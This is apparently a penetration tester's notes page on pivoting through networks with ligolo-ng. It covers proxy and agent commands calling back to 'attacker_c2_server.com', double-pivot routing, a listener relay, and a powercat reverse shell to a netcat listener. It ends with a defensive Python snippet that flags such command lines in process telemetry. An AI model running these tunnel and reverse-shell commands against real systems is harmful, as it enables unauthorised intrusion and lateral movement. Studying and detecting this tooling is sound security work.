# Ligolo

{% embed url="<https://github.com/nicocha30/ligolo-ng>" %}

{% embed url="<https://www.hackingarticles.in/a-detailed-guide-on-ligolo-ng/>" %}

{% embed url="<https://www.linkedin.com/pulse/how-tunnel-pivot-networks-using-ligolo-ng-prince-prajapati-o8gcc/>" %}

## Server (proxy)

{% code title="setup" %}

```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

ip addr show ligolo
```

{% endcode %}

{% code title="start server" %}

```bash
./proxy -laddr 0.0.0.0:3389 -selfcert 
```

{% endcode %}

{% hint style="info" %}
Choose a common port (3389, 25, 123) for the listener; the default is 11601.
{% endhint %}

## Victim (agent) - single pivot

```bash
# The port must match the proxy's -laddr port (3389 in the setup above)
./agent -connect attacker_c2_server.com:3389 -ignore-cert
```

### Server after victim joining

{% code title="@ligolo chk network config" %}

```
session 
1

>> agent xx
ifconfig
```

{% endcode %}

{% hint style="info" %}
The victim sits in the same 192.168.w.0/24 subnet and also has access to 192.168.x.0/24.
{% endhint %}

{% code title="add corr. network" %}

```bash
# Route the subnet reported by the agent's ifconfig through the tun interface
sudo ip route add 192.168.x.0/24 dev ligolo
ip route list
```

{% endcode %}

{% code title="@ligolo session" %}

```
>> agent xx
start
```

{% endcode %}

```bash
nmap 192.168.x.0/24
```

## Victim 2 (2nd agent) - double pivot

{% code title="in 2nd agent" overflow="wrap" %}

```bash
# The port must match the proxy's -laddr port (3389 in the setup above)
./agent -connect attacker_c2_server.com:3389 -ignore-cert
```

{% endcode %}

### Server after victim joining

{% code title="@ligolo chk network config" %}

```bash
session 
2

>> agent yy
ifconfig
```

{% endcode %}

{% hint style="info" %}
the machine in 192.168.x.0/24 has access to 192.168.y.0/24 subnet
{% endhint %}

{% code title="add corr. network" %}

```bash
sudo ip route add 192.168.y.0/24 dev ligolo 
ip route list
```

{% endcode %}

{% code title="@ligolo session 1" %}

```bash
stop

session
2

>> agent yy
start
```

{% endcode %}

{% hint style="info" %}
You can also switch tunnels by simply running `start` in the 2nd session and choosing to close the 1st tunnel at the prompt.
{% endhint %}

#### Port forward in 2nd agent to receive callback from 3rd victim

Traffic arriving on port 25 of victim 2 (agent 2) is directed to the attacker's (server's) listener on port 443.

{% code title="@ligolo session 2" %}

```bash
>> agent yy
listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp

listener_list
listener_stop
```

{% endcode %}

{% hint style="info" %}
A machine in the 192.168.y.0 subnet calls back to 192.168.x.0:25, which is forwarded to kali at 192.168.w.0:443.
{% endhint %}

```
listener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcp
```

{% code title="in 192.168.w.0 kali -" %}

```
nc -nlvp 443
```

{% endcode %}

{% code title="in 192.168.y.0 machine -" %}

```
powercat -c 192.168.x.0 -p 25 -ep
```

{% endcode %}

### Access agent's local port

```bash
sudo ip route add 240.0.0.1/32 dev ligolo
```

```bash
nmap 240.0.0.1
```
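
Seen from the defending side, the proxy and agent command lines above stand out in process-creation telemetry because of their flag pairs. The following is an added example, not code from these notes or from ligolo-ng: it filters constructed sample events on the flags and listener ports shown on this page, and the function names (`classify`, `hunt`), labels and event format are assumptions.

```python
import re

# Flag pairs copied from the proxy/agent command lines on this page.
# Matching on flags rather than the binary name survives a renamed executable.
SIGNATURES = {
    "agent-style": ("-connect", "-ignore-cert"),
    "proxy-style": ("-laddr", "-selfcert"),
}
# Listener ports named on this page: the suggested common ports and the default.
PAGE_PORTS = {3389, 25, 123, 11601}
ENDPOINT = re.compile(r"^[^\s:]+:(?P<port>\d{1,5})$")


def classify(cmdline):
    """Return (label, endpoint, notes) for a matching command line, else None."""
    tokens = cmdline.split()
    for label, (addr_flag, cert_flag) in SIGNATURES.items():
        if addr_flag not in tokens or cert_flag not in tokens:
            continue
        idx = tokens.index(addr_flag) + 1
        m = ENDPOINT.match(tokens[idx]) if idx < len(tokens) else None
        if m is None:
            continue  # flag present, but no host:port argument follows it
        notes = ["flag pair " + addr_flag + " + " + cert_flag]
        if int(m["port"]) in PAGE_PORTS:
            notes.append("port listed in this page's listener hint")
        return label, m.group(0), notes
    return None


def hunt(events):
    """Reduce (host, cmdline) process-creation events to tunnel candidates."""
    hits = []
    for host, cmdline in events:
        result = classify(cmdline)
        if result is not None:
            hits.append((host,) + result)
    return hits


# Constructed sample events (not real telemetry); host names are made up.
SAMPLE_EVENTS = [
    ("ws-014", r"C:\Users\Public\svc.exe -connect attacker_c2_server.com:3389 -ignore-cert"),
    ("kali", "./proxy -laddr 0.0.0.0:11601 -selfcert"),
    ("ws-022", "curl --connect-timeout 5 https://example.com"),
    ("srv-003", "sync-tool -ignore-cert -connect"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

A hit is a candidate to triage, not a verdict: other tools can share these flag names, so correlate with the destination and with TLS seen on a port that normally carries another protocol.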

